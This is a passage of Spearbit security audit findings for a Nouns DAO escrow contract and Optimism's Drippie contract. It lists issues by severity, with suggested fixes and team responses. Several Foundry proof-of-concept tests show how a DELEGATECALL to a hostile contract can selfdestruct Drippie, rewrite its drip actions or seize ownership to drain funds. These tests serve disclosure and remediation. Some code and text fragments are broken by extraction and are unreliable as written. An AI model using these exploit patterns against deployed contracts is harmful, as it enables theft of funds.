Direct stealing as a result of state manipulations is possible conditional on an ability to enter a callback. Given the absence of the latter at the moment, but the critical impact of the former, we consider this a best practice recommendation and set the severity to informational. Recommendation: Consider placing the external call after updating the state (do checks, effects, then interactions), i.e. performing one increment at a time, for example:

• NounsDAOForkEscrow.sol#L116-L125:

function returnTokensToOwner(address owner, uint256[] calldata tokenIds) external onlyDAO {
    for (uint256 i = 0; i < tokenIds.length; i++) {
        if (currentOwnerOf(tokenIds[i]) != owner) revert NotOwner();
-       nounsToken.transferFrom(address(this), owner, tokenIds[i]);
        escrowedTokensByForkId[forkId][tokenIds[i]] = address(0);
+       numTokensInEscrow--;
+       nounsToken.transferFrom(address(this), owner, tokenIds[i]);
    }
-   numTokensInEscrow -= tokenIds.length;
}

It does add storage manipulations and increases gas cost, but that can be reasonable for this somewhat rarely called function that performs only a few iterations in the majority of cases. Nouns: Won't Fix. Given the assumption of using NounsToken without external calls, the risk to Nouns DAO is zero. Spearbit: Acknowledged.

+5.5.21 No need to use an assembly block to get the chain ID Severity: Informational Context: ERC721CheckpointableUpgradeable.sol#L294-L300 Description: Currently getChainId() uses an assembly block to get the current chain ID when constructing the domain separator. This is not needed since there is a global variable for this already. Recommendation: You could consider removing the internal getChainId() method and use the global variable block.chainid instead. Nouns: Fixed in this commit: 1fc830 Spearbit: Verified.
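For clarity, a minimal sketch of the simplification (the before variant mirrors the described pattern, not the exact Nouns code):

contract ChainIdExample {
    // Before: assembly helper reading the CHAINID opcode.
    function getChainId() internal view returns (uint256 chainId) {
        assembly {
            chainId := chainid()
        }
    }

    // After: since Solidity 0.8.0 the global block.chainid exposes the
    // same value, so the helper can simply be deleted.
    function chainId() internal view returns (uint256) {
        return block.chainid;
    }
}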
+5.5.22 Naming convention for interfaces is not always followed Severity: Informational Context: NounsTokenForkLike.sol#L5 Description: The NounsTokenForkLike interface does not follow the standard naming convention for Solidity interfaces, which begins with an I prefix. This inconsistency can make it harder for developers to understand the purpose and usage of the contract. Recommendation: It is recommended to prefix the NounsTokenForkLike interface with I:

-interface NounsTokenForkLike {
+interface INounsTokenForkLike {
     function getPriorVotes(address account, uint256 blockNumber) external view returns (uint96);
     function totalSupply() external view returns (uint256);
     . . .

Nouns: Fixed in this commit ede514 Spearbit: Verified. The interface is now prefixed with I.

diff --git a/findings_newupdate/spearbit/OptimismDrippie-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/OptimismDrippie-Spearbit-Security-Review.txt new file mode 100644 index 0000000..f9f13ea --- /dev/null +++ b/findings_newupdate/spearbit/OptimismDrippie-Spearbit-Security-Review.txt @@ -0,0 +1,34 @@

+5.1.1 Permitting Multiple Drip Calls Per Block Severity: Medium Risk Context: Drippie.sol#L266 Description: The inline comments correctly note that reentrancy is possible and permitted when state.config.interval is 0. We are currently unaware of use cases where this is desirable. Reentrancy is one risk; flashbot bundles are a similar risk where the drip may be called multiple times by the same actor in a single block. A malicious actor may abuse this ability, especially if interval is misconfigured as 0 due to JavaScript type coercion. A reentrant call or flashbot bundle may be used to frontrun an owner attempting to archive a drip or attempting to withdraw assets. Recommendation: We recommend limiting drip calls to 1 per block. Document the transaction order dependence (frontrunning) risk for owners wishing to archive a drip. Reasonable drip intervals can be employed to prevent this attack. If it is important to permit multiple calls to the same drip in a single block, we recommend making the behavior opt-in rather than the default if no state.config.interval is specified.

-function create(string memory _name, DripConfig memory _config) external onlyOwner {
+function create(string memory _name, DripConfig memory _config, bool allowMultiplePerBlock) external onlyOwner {
     // Make sure this drip doesn't already exist. We *must* guarantee that no other function
     // will ever set the status of a drip back to NONE after it's been created. This is why
     // archival is a separate status.
     require(
         drips[_name].status == DripStatus.NONE,
         "Drippie: drip with that name already exists"
     );
+    require(
+        _config.interval > 0 || allowMultiplePerBlock,
+        "Drippie: explicit opt-in for 0 interval"
+    );
     // We initialize this way because Solidity won't let us copy arrays into storage yet.
     DripState storage state = drips[_name];
     state.status = DripStatus.PAUSED;
     state.config.interval = _config.interval;
     state.config.dripcheck = _config.dripcheck;
     state.config.checkparams = _config.checkparams;
     // Solidity doesn't let us copy arrays into storage, so we push each array one by one.
     for (uint256 i = 0; i < _config.actions.length; i++) {
         state.config.actions.push(_config.actions[i]);
     }
     // Tell the world!
     emit DripCreated(_name, _name, _config);
 }

Optimism: Fixed in PR #3280. Spearbit: Fixed.
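One way to realize the one-call-per-block limit is to track the last block in which each drip executed; a minimal sketch under the assumption of a new (hypothetical) lastDripBlock field, not part of the current Drippie storage:

mapping(string => uint256) internal lastDripBlock; // hypothetical per-drip tracker

function drip(string memory _name) external {
    // Reject a second call for the same drip within one block, which also
    // blocks same-block reentrancy and flashbot-bundle repetition.
    require(
        lastDripBlock[_name] != block.number,
        "Drippie: drip already called in this block"
    );
    lastDripBlock[_name] = block.number;
    // ...existing status/interval checks and action execution elided...
}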
5.2 Low Risk

+5.2.1 Version Bump to Latest Severity: Low Risk Context: Drippie.sol#L2, CheckBalanceHigh.sol#L2, CheckBalanceLow.sol#L2, CheckGelatoLow.sol#L2, CheckTrue.sol#L2 Description: During the review, a new version of solidity was released with an important bugfix. Recommendation: Move from 0.8.15 to 0.8.16. Optimism: Fixed here PR #3567. Spearbit: • Drippie solidity version has been updated to 0.8.16 in PR#3280 • CheckBalanceHigh.sol, CheckBalanceLow.sol, CheckGelatoLow.sol, CheckTrue.sol solidity versions have been updated to 0.8.16 in PR#3567

+5.2.2 DOS from External Calls in Drippie.executable / Drippie.drip Severity: Low Risk Context: Drippie.sol#L233-L236, Drippie.sol#L284 Description: In both the executable and drip (which also calls executable) functions, the Drippie contract interacts with some external contract via low-level calls. The external call could revert or fail with an Out of Gas exception, causing the entire drip to fail. The severity is low because in the case where a drip reverts due to a misconfigured or malicious dripcheck or target, the drip can still be archived and a new one can be created by the owner. Recommendation: The DOS vector is documented inline; consider elevating to @natspec and user docs. Worth noting is that drips expect the DripAction.target to revert on failure and not fail silently. In other words, all action targets MUST revert on failure, else unexpected behaviour between actions may occur.

+5.2.3 Use call.value over transfer in withdrawETH Severity: Low Risk Context: AssetReceiver.sol#L89 Description: transfer is no longer recommended as a default due to unpredictable gas cost changes in future evm hard forks (see here for more background). While useful to use transfer in some cases (such as sending to an EOA or a contract which does not process data in the fallback or receive functions), this particular contract does not benefit: withdrawETH is already owner gated and is not at risk of reentrancy, as the owner already has permission to drain the contract's ether in a single call should they choose. Recommendation: Use call.value over transfer in withdrawETH. Spearbit: Note that the implementation in PR#3280 has moved from transfer to a low-level call but still has some issues. The success value returned from the call is never used, returned as a function return variable, or checked at all. For this reason, the current implementation of withdrawETH allows the function to "fail silently" when the internal low-level call fails and returns success = false. In this case, the ETH has not been transferred to the recipient, but because the "main" transaction does not revert, the WithdrewETH event is still emitted, and the caller will think that the ETH has been correctly transferred. Optimism: We agree and intend to fix this, though not immediately. This is OK as it's an onlyOwner gated function which we expect to use very infrequently. Spearbit: Acknowledged.

+5.2.4 Input Validation Checks for Drippie.create Severity: Low Risk Context: Drippie.sol#L126-L149 Description: Drippie.create does not validate input, potentially leading to unintended results. The function should check: • _name is not an empty string, to avoid creating a drip that cannot be read on a frontend UI. • _config.dripcheck should not be address(0), otherwise executable will always revert. • _config.actions.length should be at least one (_config.actions.length > 0) to prevent creating drips that do nothing when executed.
• DripAction.target should not be address(0), to prevent burning ETH or interacting with the zero address during a drip's execution. Recommendation: Consider implementing the suggested checks to prevent misconfigured drips. DripAction.data and DripConfig.params are not type checked; however, there is no simple fix without sacrificing flexibility. We recommend surfacing a caution in user docs.

+5.2.5 Ownership Initialization and Transfer Safety on Owned.setOwner Severity: Low Risk Context: Drippie.sol#L116 Description: Consider the following scenarios. • Scenario 1: Drippie allows the owner to be both initialized and set to address(0). If this scenario happens, nobody will be able to manage the Drippie contract, thus preventing any of the following operations: • Creating a new drip • Updating a drip's status (pausing, activating or archiving a drip) If set to the zero address, all the onlyOwner operations in AssetReceiver and Transactor will be uncallable. This scenario where the owner can be set to address(0) can occur when address(0) is passed to the constructor or setOwner. • Scenario 2: owner may be set to address(this). Given the static nature of DripAction.target and DripAction.data there is no benefit of setting owner to address(this), and all instances can be assumed to have been done so in error. Recommendation: Add a check for address(0) and address(this) in both the constructor and setOwner. For added safety, require the new owner to accept the ownership before ownership is transferred.

+5.2.6 Unchecked Return and Handling of Non-standard Tokens in AssetReceiver Severity: Low Risk Context: AssetReceiver.sol#L116 Description: The current AssetReceiver contract implements "direct" ETH and ERC20 token transfers, but does not cover edge cases like non-standard ERC20 tokens that do not: • revert on failed transfers • adhere to the ERC20 interface (i.e. no return value) An ERC20 token that does not revert on failure would cause the WithdrewERC20 event to emit even though no transfer took place. An ERC20 token that does not have a return value will revert even if the call would have otherwise been successful. Solmate libraries already used inside the project offer a utility library called SafeTransferLib.sol which covers such edge cases. Be aware of the developer comments in the natspec: /// @dev Use with caution! Some functions in this library knowingly create dirty bits at the destination of the free memory pointer. /// @dev Note that none of the functions in this library check that a token has code at all! That responsibility is delegated to the caller. Recommendation: Consider integrating Solmate SafeTransferLib inside AssetReceiver to cover edge cases.

+5.2.7 AssetReceiver Allows Burning ETH, ERC20 and ERC721 Tokens Severity: Low Risk Context: AssetReceiver.sol#L89, AssetReceiver.sol#L116, AssetReceiver.sol#L133 Description: AssetReceiver contains functions that allow the owner of the contract to withdraw ETH, ERC20 and ERC721 tokens. Those functions allow specifying the receiver address of the ETH, ERC20 and ERC721 tokens, but they do not check that the receiver address is not address(0). By not doing so, those functions allow to: • Burn ETH if sent to address(0). • Burn ERC20 tokens if sent to address(0) and the ERC20 _asset allows tokens to be burned via transfer (for example, Solmate's ERC20 allows that; OpenZeppelin instead will revert if the recipient is address(0)).
• Burn ERC721 tokens if sent to address(0) and the ERC721 _asset allows tokens to be burned via transferFrom (for example, both the Solmate and OpenZeppelin implementations prevent sending the _id to address(0), but you don't know if that is still true of custom ERC721 contracts that do not use those libraries). Recommendation: Add a check on all those functions to revert if _to is address(0).

+5.2.8 AssetReceiver Not Implementing onERC721Received Callback Required by safeTransferFrom Severity: Low Risk Context: AssetReceiver.sol Description: AssetReceiver contains the function withdrawERC721 that allows the owner to withdraw ERC721 tokens. As stated in EIP-721, safeTransferFrom (used by the sender to transfer ERC721 tokens to the AssetReceiver) will revert if the target contract (AssetReceiver in this case) does not implement onERC721Received and return the expected value bytes4(keccak256("onERC721Received(address,address,uint256,bytes)")). Recommendation: Add the onERC721Received callback function in the AssetReceiver contract to be able to receive ERC721 tokens.

+5.2.9 Both Transactor.CALL and Transactor.DELEGATECALL Do Not Emit Events Severity: Low Risk Context: Transactor.sol#L27-L34, Transactor.sol#L46-L53 Description: Transactor contains "general purpose" DELEGATECALL and CALL functions that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both of those functions execute delegatecall and call without emitting any events. Because of the general-purpose nature of these functions, it would be considered a good security measure to emit events to track the functions' usage. Those events could then be used to monitor and track usage by external monitoring services. Recommendation: Consider adding event emission to both the delegatecall and call functions.

+5.2.10 Both Transactor.CALL and Transactor.DELEGATECALL Do Not Check the Result of the Execution Severity: Low Risk Context: Transactor.sol#L27-L34, Transactor.sol#L46-L53 Description: The Transactor contract contains "general purpose" DELEGATECALL and CALL functions that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both functions return the delegatecall and call result back to the caller without checking whether execution was successful or not. By not implementing such a check, the transaction could fail silently. Another side effect is that the ETH sent along with the execution (both functions are payable) would remain in the Drippie contract and not be transferred to the _target. Test example showcasing the issue:

contract Useless {
    // A contract that has no functions
    // No fallback functions
    // Will not accept ETH (only from selfdestruct/coinbase)
}

function test_transactorCALL() public {
    Useless useless = new Useless();
    bool success;
    vm.deal(deployer, 3 ether);
    vm.deal(address(drippie), 0 ether);
    vm.deal(address(useless), 0 ether);

    vm.prank(deployer);
    // send 1 ether via `call` to a contract that cannot receive them
    (success, ) = drippie.CALL{value: 1 ether}(address(useless), "", 100000, 1 ether);
    assertEq(success, false);

    vm.prank(deployer);
    // Perform a `call` to a non-existing target function
    (success, ) = drippie.CALL{value: 1 ether}(address(useless), abi.encodeWithSignature("notExistingFn()"), 100000, 1 ether);
    assertEq(success, false);

    assertEq(deployer.balance, 1 ether);
    assertEq(address(drippie).balance, 2 ether);
    assertEq(address(useless).balance, 0);
}

function test_transactorDELEGATECALL() public {
    Useless useless = new Useless();
    bool success;
    vm.deal(deployer, 3 ether);
    vm.deal(address(drippie), 0 ether);
    vm.deal(address(useless), 0 ether);

    vm.prank(deployer);
    // send 1 ether via `delegatecall` to a contract that cannot receive them
    (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), "", 100000);
    assertEq(success, false);

    vm.prank(deployer);
    // Perform a `delegatecall` to a non-existing target function
    (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), abi.encodeWithSignature("notExistingFn()"), 100000);
    assertEq(success, false);

    assertEq(deployer.balance, 1 ether);
    assertEq(address(drippie).balance, 2 ether);
    assertEq(address(useless).balance, 0);
}

Recommendation: Consider adding a check on both functions to cause the transaction to revert in case the execution of delegatecall or call returns success == false.

+5.2.11 Transactor.DELEGATECALL Data Overwrite and selfdestruct Risks Severity: Low Risk Context: Transactor.sol#L46-L53 Description: The Transactor contract contains a "general purpose" DELEGATECALL function that allows the owner to execute a delegatecall toward a target address passing an arbitrary payload. Consider the following scenarios: • Scenario 1: A malicious target contract could selfdestruct the Transactor contract and, as a consequence, the contract that is inheriting from Transactor. Test example showcasing the issue:

contract SelfDestroyer {
    function destroy(address receiver) external {
        selfdestruct(payable(receiver));
    }
}

function test_canOwnerSelftDestructDrippie() public {
    // Assert that Drippie exists
    assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED);
    assertGt(getContractSize(address(drippie)), 0);

    // set it to active
    vm.prank(deployer);
    drippie.status(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE);
    assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE);

    // fund the drippie with 1 ETH
    vm.deal(address(drippie), 1 ether);
    uint256 deployerBalanceBefore = deployer.balance;
    uint256 drippieBalanceBefore = address(drippie).balance;

    // deploy the destroyer
    SelfDestroyer selfDestroyer = new SelfDestroyer();
    vm.prank(deployer);
    drippie.DELEGATECALL(address(selfDestroyer), abi.encodeWithSignature("destroy(address)", deployer), gasleft());

    uint256 deployerBalanceAfter = deployer.balance;
    uint256 drippieBalanceAfter = address(drippie).balance;

    // assert that the deployer has received the balance that was present in Drippie
    assertEq(deployerBalanceAfter, deployerBalanceBefore + drippieBalanceBefore);
    assertEq(drippieBalanceAfter, 0);

    // Weird things happen with forge
    // Because we are in the same block the code of the contract is still > 0 so
    // cannot use assertEq(getContractSize(address(drippie)), 0);
    // Known forge issues:
    // 1) Forge resets storage var to 0 after self-destruct (before tx ends) -> https://github.com/foundry-rs/foundry/issues/2654
    // 2) selfdestruct has no effect in test -> https://github.com/foundry-rs/foundry/issues/1543
    assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED);
}

• Scenario 2: The delegatecall allows the owner to intentionally, or accidentally, overwrite the content of the drips mapping.
By being able to modify the drips mapping, a malicious user would be able to execute a series of actions like: Changing a drip's status: • Activating an archived drip • Deleting a drip by changing the status to NONE (this allows the owner to override the drip entirely by calling create again) • Switching an active/paused drip to paused/active • etc. Changing a drip's interval: • Prevent a drip from being executed any more by setting interval to a very high value • Allow a drip to be executed more frequently by lowering the interval value • Enable reentrancy by setting interval to 0 Changing a drip's actions: • Override an action to send the drip contract's balance to an arbitrary address • etc. Test example showcasing the issue:

contract ChangeDrip {
    address public owner;
    mapping(string => Drippie.DripState) public drips;

    function someInnocentFunction() external {
        drips["FUND_BRIDGE_WALLET"].config.actions[0] = Drippie.DripAction({
            target: payable(address(1024)),
            data: new bytes(0),
            value: 1 ether
        });
    }
}

function test_canDELEGATECALLAllowReplaceAction() public {
    vm.deal(address(drippie), 10 ether);
    vm.deal(address(attacker), 0 ether);

    // Create an action with name "FUND_BRIDGE_WALLET" that has the function
    // to fund a wallet
    vm.startPrank(deployer);
    string memory fundBridgeWalletName = "FUND_BRIDGE_WALLET";
    Drippie.DripAction[] memory actions = new Drippie.DripAction[](1);
    // The first action will send Bob 1 ether
    actions[0] = Drippie.DripAction({ target: payable(address(alice)), data: new bytes(0), value: 1 ether });
    Drippie.DripConfig memory config = createConfig(100, IDripCheck(address(checkTrue)), new bytes(0), actions);
    drippie.create(fundBridgeWalletName, config);
    drippie.status(fundBridgeWalletName, Drippie.DripStatus.ACTIVE);
    vm.stopPrank();

    // Deploy the malicious contract
    vm.prank(attacker);
    ChangeDrip changeDripContract = new ChangeDrip();

    // make the owner of drippie call via DELEGATECALL an innocent function of the exploiter contract
    vm.prank(deployer);
    drippie.DELEGATECALL(address(changeDripContract), abi.encodeWithSignature("someInnocentFunction()"), 1000000);

    // Now the drip action should have changed, anyone can execute it and funds would be sent to
    // the attacker and not to the bridge wallet
    drippie.drip(fundBridgeWalletName);

    // Assert we have drained Drippie
    assertEq(attacker.balance, 1 ether);
    assertEq(address(drippie).balance, 9 ether);
}

• Scenario 3: Calling a malicious contract, or accidentally calling a contract which does not account for Drippie's storage layout, can result in owner being overwritten. Test example showcasing the issue:

contract GainOwnership {
    address public owner;

    function someInnocentFunction() external {
        owner = address(1024);
    }
}
// Assert that the attacker has gained onwership assertEq(drippie.owner(), attacker); // Steal all the funds vm.prank(attacker); drippie.withdrawETH(payable(attacker)); // Assert we have drained Drippie assertEq(attacker.balance, 10 ether); assertEq(address(drippie).balance, 0 ether); } Recommendation: • On all Scenarios Document and instruct users to pay attention to each contract that Transactor interacts with when DELEGATECALL is called to prevent situations like this. If Drippie does not need to allow the owner to execute general purpose delegatecall consider removing the Transactor dependency from the inheritance chain. Be particularly cautious calling out to upgradeable contracts/proxies. • Scenario 1 Deploying with create2 allows for recovery of any tokens managed by the Drippie contract in the event it is accidentally selfdestructed by redeploying to the same address. • Scenario 3 A postcondition can also assist in protecting accidental owner overwriting: function DELEGATECALL( address _target, bytes memory _data, uint256 _gas ) external payable onlyOwner returns (bool, bytes memory) { + address prevOwner = owner; // slither-disable-next-line controlled-delegatecall return _target.delegatecall{ gas: _gas }(_data); (bool success, bytes memory res) = _target.delegatecall{ gas: _gas }(_data); require(prevOwner == owner, "accidential onwer overwrite"); return (success, res); - + + + } 13 5.3 Gas Optimization +5.3.1 Use calldata over memory Severity: Gas Optimization Context: Drippie.sol#L126, Drippie.sol#L160, Drippie.sol#L213, Drippie.sol#L252 Description: Some gas savings if function arguments are passed as calldata instead of memory. Recommendation: Use calldata in these instances. Optimism: Addressed in PR#3280. Spearbit: Fixed. +5.3.2 Avoid String names in Events and Mapping Key Severity: Gas Optimization Context: Drippie.sol#L111 Description: Drip events emit an indexed nameref and the name as a string. These strings must be passed into every drip call adding to gas costs for larger strings. Recommendation: For off chain uses, i.e. user interface display, the names are useful. A more gas efficient approach would be to use uint256 or bytes32 for drip mapping keys. The string names may still be stored in DripState for off chain reading, but gas would be saved in not logging names each time a drip is called and not needing to incur the variable gas costs longer names introduce. +5.3.3 Avoid Extra sloads on Drippie.status Severity: Gas Optimization Context: Drippie.sol#L160 Description: Information for emitting event can be taken from calldata instead of reading from storage. Can skip repeat drips[_name].status reads from storage. Recommendation: Consider implementing the following fixes. function status(string memory _name, DripStatus _status) external onlyOwner { ...snip... // If we made it here then we can safely update the status. drips[_name].status = _status; emit DripStatusUpdated(_name, _name, _status); emit DripStatusUpdated(_name, _name, drips[_name].status); + - } and function status(string memory _name, DripStatus _status) external onlyOwner { ...snip... + DripStatus currentStatus = drips[_name].status; // Make sure the drip in question actually exists. Not strictly necessary but there doesn't // seem to be any clear reason why you would want to do this, and it may save some gas in // the case of a front-end bug. 
    require(
+       currentStatus != DripStatus.NONE,
-       drips[_name].status != DripStatus.NONE,
        "Drippie: drip with that name does not exist"
    );

    // Once a drip has been archived, it cannot be un-archived. This is, after all, the entire
    // point of archiving a drip.
    require(
+       currentStatus != DripStatus.ARCHIVED,
-       drips[_name].status != DripStatus.ARCHIVED,
        "Drippie: drip with that name has been archived"
    );

    // Although not strictly necessary, we make sure that the status here is actually changing.
    // This may save the client some gas if there's a front-end bug and the user accidentally
    // tries to "change" the status to the same value as before.
    require(
+       currentStatus != _status,
-       drips[_name].status != _status,
        "Drippie: cannot set drip status to same status as before"
    );

    // If the user is trying to archive this drip, make sure the drip has been paused. We do
    // not allow users to archive active drips so that the effects of this action are more
    // abundantly clear.
    if (_status == DripStatus.ARCHIVED) {
        require(
+           currentStatus == DripStatus.PAUSED,
-           drips[_name].status == DripStatus.PAUSED,
            "Drippie: drip must be paused to be archived"
        );
    }
    ...snip...
}

Optimism: Addressed in PR#3280. Spearbit: Fixed.

+5.3.4 Use Custom Errors Instead of Strings Severity: Gas Optimization Context: Drippie.sol Description: To save some gas, the use of custom errors leads to cheaper deploy time cost and run time cost. The run time cost is only relevant when the revert condition is met. Recommendation: Consider using custom errors instead of revert strings. Optimism: Chose not to implement. Spearbit: Acknowledged.

+5.3.5 Increment In The For Loop Post Condition In An Unchecked Block Severity: Gas Optimization Context: Drippie.sol#L143, Drippie.sol#L273 Description: This is only relevant if you are using the default solidity checked arithmetic. i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by:

for (uint i = 0; i < length; ) {
    // do something that doesn't change the value of i
    unchecked {
        ++i;
    }
}

Recommendation: Consider doing the increment in the for loop post condition in an unchecked block. Optimism: Chose not to implement. Spearbit: Acknowledged.

5.4 Informational

+5.4.1 DripState.count Location and Use Severity: Informational Context: Drippie.sol#L61, Drippie.sol#L300 Description: DripState.count is recorded and never used within the Drippie or IDripCheck contracts. DripState.count is also incremented after all external calls, inconsistent with the Checks, Effects, Interactions convention. Recommendation: Consider implementing the following recommendations. Recommendation 1: increment DripState.count before external calls. Recommendation 2: consider removing DripState.count entirely if it is not used on chain. Recommendation 3: if DripState.count is not removed, consider whether the information is useful in any future DripChecks. Optimism: Recommendation 1 implemented in PR#3280. Spearbit: Recommendation 1 implemented.
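A minimal sketch of Recommendation 1 under the Checks-Effects-Interactions convention (assuming Drippie's existing DripState fields; the surrounding checks are elided):

function drip(string memory _name) external {
    DripState storage state = drips[_name];
    // ...executable/interval checks elided...

    // Effects: record the execution before any external interaction so the
    // stored count can never be observed stale during a reentrant call.
    state.last = block.timestamp;
    state.count++;

    // Interactions: execute the configured actions last.
    for (uint256 i = 0; i < state.config.actions.length; i++) {
        // ...external call for state.config.actions[i] elided...
    }
}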
+5.4.2 Type Checking Foregone on DripCheck Severity: Informational Context: IDripCheck.sol#L4 Description: Passing params as bytes makes for a flexible DripCheck; however, type checking is lost. Recommendation: A helper may be added to DripChecks for users to confirm a properly constructed params bytes array prior to creating a drip.

contract CheckBalanceLow is IDripCheck {
    event _EventToExposeStructInABI__Params(Params params);

    struct Params {
        address target;
        uint256 threshold;
    }

    function check(bytes memory _params) external view returns (bool) {
        Params memory params = abi.decode(_params, (Params));
        // Check target ETH balance is below threshold.
        return params.target.balance < params.threshold;
    }

+   function encodeCheck(address target, uint256 threshold) external view returns (bytes memory) {
+       Params memory toEncode = Params(target, threshold);
+       return abi.encode(toEncode);
+   }
}

+5.4.3 Confirm Blind ERC721 Transfers are Intended Severity: Informational Context: AssetReceiver.sol#L133 Description: AssetReceiver uses transferFrom instead of safeTransferFrom. The callback on safeTransferFrom often poses a reentrancy risk, but in this case the function is restricted to onlyOwner. Recommendation: Consider the added safety of safeTransferFrom when sending to contracts.

+5.4.4 Code Contains Empty Blocks Severity: Informational Context: Transactor.sol#L14, AssetReceiver.sol#L63 Description: It's best practice that when there is an empty block, a comment is added in the block explaining why it's empty. While not technically errors, empty blocks can cause confusion when reading code. Recommendation: Consider adding /* Comment on why */ to the empty blocks. Optimism: Chose not to implement. Spearbit: Acknowledged.

+5.4.5 Code Structure Deviates From Best-Practice Severity: Informational Context: Drippie.sol#L100-L111, CheckGelatoLow.sol#L15-L20, CheckBalanceLow.sol#L11-L15, CheckBalanceHigh.sol#L11-L15 Description: The best-practice layout for a contract should follow this order: • State variables. • Events. • Modifiers. • Constructor. • Functions. Function ordering helps readers identify which functions they can call and find constructor and fallback functions more easily. Functions should be grouped according to their visibility and ordered as: constructor, receive function (if exists), fallback function (if exists), external, public, internal, private. Some constructs deviate from this recommended best-practice: structs and mappings after events. Recommendation: Consider adopting the recommended best-practice for code structure and layout. Optimism: Fixed in PR#3280. Spearbit: Fixed.

+5.4.6 Missing or Incomplete NatSpec Severity: Informational Context: AssetReceiver.sol#L19, CheckTrue.sol, CheckGelatoLow.sol, CheckBalanceLow.sol, CheckBalanceHigh.sol Description: Some functions are missing @notice/@dev NatSpec comments for the function, @param for all/some of their parameters and @return for return values. Given that NatSpec is an important part of code documentation, this affects code comprehension, auditability and usability. Recommendation: Consider adding full NatSpec comments for all functions to have complete code documentation for future use. Optimism: Fixed in PR#3280. Spearbit: Fixed.

+5.4.7 Checking Boolean Against Boolean Severity: Informational Context: Drippie.sol#L256-L259 Description: executable returns a boolean, in which case the comparison to true is unnecessary. executable also reverts if any precondition check fails, in which case false will never be returned.
Recommendation: If important to check, change require to assert to facilitate invariant checking (using tools like Mythril):

function drip(string memory _name) external {
    DripState storage state = drips[_name];

    // Make sure the drip can be executed.
-   require(
+   assert(
-       executable(_name) == true,
+       executable(_name)
-       "Drippie: drip cannot be executed at this time, try again later"
    );
    ...snip...
}

Or, remove the extra check entirely:

function drip(string memory _name) external {
    DripState storage state = drips[_name];

    // Make sure the drip can be executed.
-   require(
-       executable(_name) == true,
-       "Drippie: drip cannot be executed at this time, try again later"
-   );
+   executable(_name);
    ...snip...
}

Optimism: The recommendation has been implemented in PR#3280. Spearbit: Fixed.

+5.4.8 Drippie.executable Never Returns false, Only true or Reverts Severity: Informational Context: Drippie.sol#L206-L240 Description: The executable function implemented in the Drippie contract has the following signature: executable(string memory _name) public view returns (bool). From the signature and the natspec documentation ("@return True if the drip is executable, false otherwise."), without reading the code a user/developer would expect that the function returns true if all the checks pass and otherwise false, but in reality the function will always return true or revert. Because of this behavior, a drip that does not pass the requirements inside executable will never revert with the message present in the following code executed by the drip function:

require(
    executable(_name) == true,
    "Drippie: drip cannot be executed at this time, try again later"
);

Recommendation: If the current implementation is the expected behavior, consider updating the natspec of the function to reflect the function's implementation. Optimism: The recommendation has been implemented in PR#3280. Spearbit: Fixed.

+5.4.9 Drippie Use Case Notes Severity: Informational Description: Drippie intends to support use cases outside of the initial hot EOA top-up use case demonstrated by Optimism. To further clarify, we've noted that drips support: • Sending eth
The important part that should be clear in the natspec documentation of the drip function is that that specific check is performed only once before the execution of the bulk of actions. Recommendation: Consider updating the natspec documentation of the drip function, making explicit that the check done by dripcheck.checkis performed only before executing the batch of actions. Optimism: The recommendation has been implemented in the PR#3280. Spearbit: Fixed. 20 +5.4.11 Considerations on the drip state.last and state.config.interval values Severity: Informational Context: Drippie.sol#L227-L230 Description: When the drip function is called by an external actor, the executable is executed to check if the drip meets all the needed requirements to be executed. The only check that is done regarding the drip state.last and state.config.interval is this require( state.last + state.config.interval <= block.timestamp, "Drippie: drip interval has not elapsed since last drip" ); The state.time is never really initialized when the create function is called, this means that it will be automatically initialized with the default value of the uint256 type: 0. • Consideration 1: Drips could be executed as soon as created Depending on the value set to state.config.interval the executable’s logic implies that as soon as a drip is created, the drip can be immediately (even in the same transaction) executed via the drip function. • Consideration 2: A very high value for interval could make the drip never executable block.timestamp represents the number of seconds that passed since Unix Time (1970-01-01T00:00:00Z). When the owner of the Drippie want to create a "one shot" drip that can be executed immediately after creation but only once (even if the owner forgets to set the drip’s status to ARCHIVED) he/she should be aware that the max value that he/she can use for the interval is at max block.timestamp. This mean that the second time the drip can be executed is after block.timestamp seconds have been passed. If, for example, the owner create right now a drip with interval = block.timestamp it means that after the first execution the same drip could be executed after ~52 years (~2022-1970). Recommendation: At minimum, include documentation to highlight that drips could be immediately callable after creation, depending on the interval value. Consider the mentioned limitation of the interval max value if you want to have "one shot" actions that can be triggered as soon as created. Consider adding an additional mechanism to manage the scenario where a drip should be executed only after a specific timestamp is passed. +5.4.12 Support ERC1155 in AssetReceiver Severity: Informational Context: AssetReceiver.sol#L128 Description: AssetReceiver support ERC20 and ERC721 interfaces but not ERC1155. Recommendation: For generalized use cases, considering adding support for ERC1155. 21 +5.4.13 Reorder DripStatus Enum for Clarity Severity: Informational Context: Drippie.sol#L30-L31 Description: The current implementation of Drippie contract has the following enum type: enum DripStatus { NONE, // uint8(0) ACTIVE, PAUSED, ARCHIVED } When a drip is created via the create function, its status is initialized to PAUSED (equal to uint8(2)) and when it gets activated its status is changed to ACTIVE (equal to uint8(1)) So, the status change from 0 (NONE) to 2 (PAUSED) to 1 (ACTIVE). Switching the order inside the enum DripStatus definition between PAUSED and ACTIVE would make it more clean and easier to understand. 
+5.4.12 Support ERC1155 in AssetReceiver Severity: Informational Context: AssetReceiver.sol#L128 Description: AssetReceiver supports the ERC20 and ERC721 interfaces but not ERC1155. Recommendation: For generalized use cases, consider adding support for ERC1155.

+5.4.13 Reorder DripStatus Enum for Clarity Severity: Informational Context: Drippie.sol#L30-L31 Description: The current implementation of the Drippie contract has the following enum type:

enum DripStatus {
    NONE, // uint8(0)
    ACTIVE,
    PAUSED,
    ARCHIVED
}

